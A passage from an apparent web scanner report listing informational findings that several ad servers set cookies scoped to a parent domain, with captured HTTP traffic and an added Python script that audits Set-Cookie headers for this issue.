document.write('<!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n<script src=\"http://s0.2mdn.net/879366/
...[SNIP]...

13.41. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4359.advertising.comOX2601/B5797640.2

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=78334226=_4e88fd23,1577287805,812162%5E1072156%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=78334226/optn=64?trg=;ord=1577287805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8491
Set-Cookie: id=ce2ced83c000015||t=1317600592|et=730|cs=002213fd48e3531570c028be26; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:52 GMT
Date: Mon, 03 Oct 2011 00:09:52 GMT
Expires: Mon, 03 Oct 2011 00:09:52 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Sep 16 16:30:33 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

13.42. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6;sz=160x600;click=http://a1.interclick.com/icaid/194896/tid/bc07e8b0-ee36-425c-ab65-77ee7d5dd2f6/click.ic?;ord=634531823360070511? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Set-Cookie: id=cc4c0d83c0000c2||t=1317600005|et=730|cs=002213fd48de979b12208ed0a7; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:05 GMT
Date: Mon, 03 Oct 2011 00:00:05 GMT
Expires: Mon, 03 Oct 2011 00:00:05 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Sep 07 14:26:44 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

13.43. http://ad.doubleclick.net/adj/gna.en/level2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gna.en/level2

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/gna.en/level2;tile=1;sz=728x90;ord=940345?area=2l&pos=1&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 463
Set-Cookie: id=c2dc0d83c00000a||t=1317599968|et=730|cs=002213fd481295e253bf9da118; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:59:28 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:59:28 GMT
Date: Sun, 02 Oct 2011 23:59:28 GMT
Expires: Sun, 02 Oct 2011 23:59:28 GMT
Cache-Control: private

document.write('<iframe id=\'a61a57b3\' name=\'a61a57b3\' src=\'http://d.tradex.openx.com/afr.php?zoneid=6393&amp;cb=INSERT_RANDOM_NUMBER_HERE\' frameborder=\'0\' scrolling=\'no\' width=\'728\' height
...[SNIP]...

13.44. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;141652382;20702477;a?http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States
Set-Cookie: id=c9aced83c00000a|644190/486643/15250|t=1317600576|et=730|cs=002213fd4868e541ded676c08a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:36 GMT
Date: Mon, 03 Oct 2011 00:09:36 GMT
Server: GFE/2.0
Content-Type: text/html


13.45. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
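Every finding in this section comes from the same check: a Set-Cookie header whose Domain attribute names a parent of the host that issued it. The Python below is an added example, not code from the XSS.CX report or from the scanner that produced it. It reproduces that check over the Set-Cookie lines shown for ads.pointroll.com (kept exactly as sent, including the missing space after the colon and the trailing ";;") and api.wipmania.com, plus a constructed SID cookie standing in for the apis.google.com one. The session-token heuristic (name hints, then value length and entropy) and the Secure/HttpOnly reporting are assumptions of this example, not the scanner's actual rules.

```python
"""Reproduce the "cookie scoped to parent domain" check from captured Set-Cookie headers.

Added example for this report; it is not code from XSS.CX or from the scanner
that produced the findings. Inputs below are copied from the responses shown
above, except the SID value, which is constructed.
"""
import math
import re
from collections import Counter
from typing import Dict, List, Optional

# Set-Cookie lines exactly as ads.pointroll.com sent them above: no space after
# the colon and a trailing ";;" on two of them. Only PRgo is scoped to a parent.
POINTROLL_HEADERS = [
    "Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;",
    "Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;",
    "Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;",
]

# From the api.wipmania.com response above; the value ends in "==" so a naive
# split on "=" would corrupt it.
WIPMANIA_HEADERS = [
    "Set-Cookie: uid=xw/qB06JAz2HWy4DCzpOAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/",
]

# Constructed stand-in for the apis.google.com SID cookie (real value omitted);
# the attribute layout matches the response above.
GOOGLE_HEADERS = [
    "Set-Cookie: SID=CONSTRUCTED_EXAMPLE_VALUE_0123456789abcdef;Domain=.google.com;Path=/;Expires=Thu, 30-Sep-2021 00:09:20 GMT",
]

# Name fragments treated as session-ish (assumption of this example).
SESSION_NAME_HINTS = ("sess", "sid", "token", "auth", "login")


def parse_set_cookie(header: str) -> Optional[Dict[str, str]]:
    """Parse one Set-Cookie header into name, value and lower-cased attribute keys.

    Attribute values keep their case (Domain is compared case-insensitively
    later). Empty segments produced by ';;' are dropped.
    """
    m = re.match(r"^Set-Cookie:\s*(.*)$", header, re.IGNORECASE | re.DOTALL)
    if not m:
        return None
    parts = [p.strip() for p in m.group(1).split(";")]
    parts = [p for p in parts if p]
    if not parts or "=" not in parts[0]:
        return None
    name, value = parts[0].split("=", 1)
    cookie = {"name": name.strip(), "value": value.strip()}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        cookie[key.strip().lower()] = val.strip()
    return cookie


def is_parent_domain(issuing_host: str, domain_attr: str) -> bool:
    """True when domain_attr names a proper parent of issuing_host.

    RFC 6265 ignores a leading dot, and a Domain equal to the host itself does
    not widen the cookie's scope. Suffix matching is done on a label boundary,
    so "pointroll.com.evil" is not a parent of "ads.pointroll.com".
    """
    host = issuing_host.lower().rstrip(".")
    dom = domain_attr.lower().lstrip(".").rstrip(".")
    if not dom or dom == host:
        return False
    return host.endswith("." + dom)


def shannon_entropy(value: str) -> float:
    """Bits of entropy per character of value (0.0 for an empty string)."""
    if not value:
        return 0.0
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values())


def looks_like_session_token(name: str, value: str) -> bool:
    """Heuristic (an assumption of this example, not the scanner's rule):
    a session-ish name, or a long high-entropy value, marks a candidate token."""
    if any(hint in name.lower() for hint in SESSION_NAME_HINTS):
        return True
    return len(value) >= 32 and shannon_entropy(value) > 4.0


def audit(issuing_host: str, headers: List[str]) -> List[Dict[str, object]]:
    """Return one finding per cookie whose Domain is a parent of issuing_host."""
    findings: List[Dict[str, object]] = []
    for header in headers:
        cookie = parse_set_cookie(header)
        if cookie is None or "domain" not in cookie:
            continue  # host-only cookie: bound to the issuing host, nothing to flag
        if not is_parent_domain(issuing_host, cookie["domain"]):
            continue
        findings.append({
            "name": cookie["name"],
            "domain": cookie["domain"],
            "session_like": looks_like_session_token(cookie["name"], cookie["value"]),
            "secure": "secure" in cookie,
            "httponly": "httponly" in cookie,
        })
    return findings


if __name__ == "__main__":
    for host, hdrs in [("ads.pointroll.com", POINTROLL_HEADERS),
                       ("api.wipmania.com", WIPMANIA_HEADERS),
                       ("apis.google.com", GOOGLE_HEADERS)]:
        for finding in audit(host, hdrs):
            print(host, finding)
```

Run against the pointroll headers it reports only PRgo (the two cookies with domain=ads.pointroll.com are host-scoped and ignored); against the constructed Google header it flags SID as session-like on name alone, which is the case the scanner's "does not appear to contain a session token" wording glosses over.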

13.46. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: b and vsd. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1861717&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13beg%2C15sx4"

Response

HTTP/1.1 200 OK
Set-Cookie: b="%3A%3A13wid%2C13beg%2C15sx4"; path=/; domain=.adbrite.com; expires=Tue, 02-Oct-2012 01:53:09 GMT
Set-Cookie: vsd=0@1@4e891585@ads.pubmatic.com; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 01:53:09 GMT
Content-Type: application/x-javascript
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 298

document.writeln("<script type=\"text/javascript\">\nvar pubId=26620;\nvar siteId=26621;\nvar kadId=21556;\nvar kadwidth=300;\nvar kadheight=250;\nvar kadNetwork=6;\nvar kadtype=1;\n<\/script>\n<scrip
...[SNIP]...

13.47. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: imp, p161r and p194r. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=15&url=virgin.dr.dfa&inv=doubleclick&rnd=1317602293772&esc=0&CustomQuery=eaid%3D245735545%26epid%3D70101326%26esid%3D1128332%26ecid%3D43398155%26ebuy%3D5794457%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317601703104_282600831_ap3104_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1317602404442_239271924_as3101_imp|194#1317602404442_239271924_as3101_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Set-Cookie: p194r=b$u-98#5.8Qp|i-tracking#..2.8Qp.2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:40:03 GMT
Content-Length: 2204

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1317602404442_239271924_as3101_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1317602404442_239271924_as3
...[SNIP]...

13.48. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d928398/20/44069375/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: CS1 and ES. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d928398/20/44069375/decide.php?ord=1317600550 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:01 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: CS1=deleted; expires=Sun, 03 Oct 2010 00:10:00 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_928398-1-3; expires=Thu, 22 Nov 2012 16:10:01 GMT; path=/; domain=.questionmarket.com
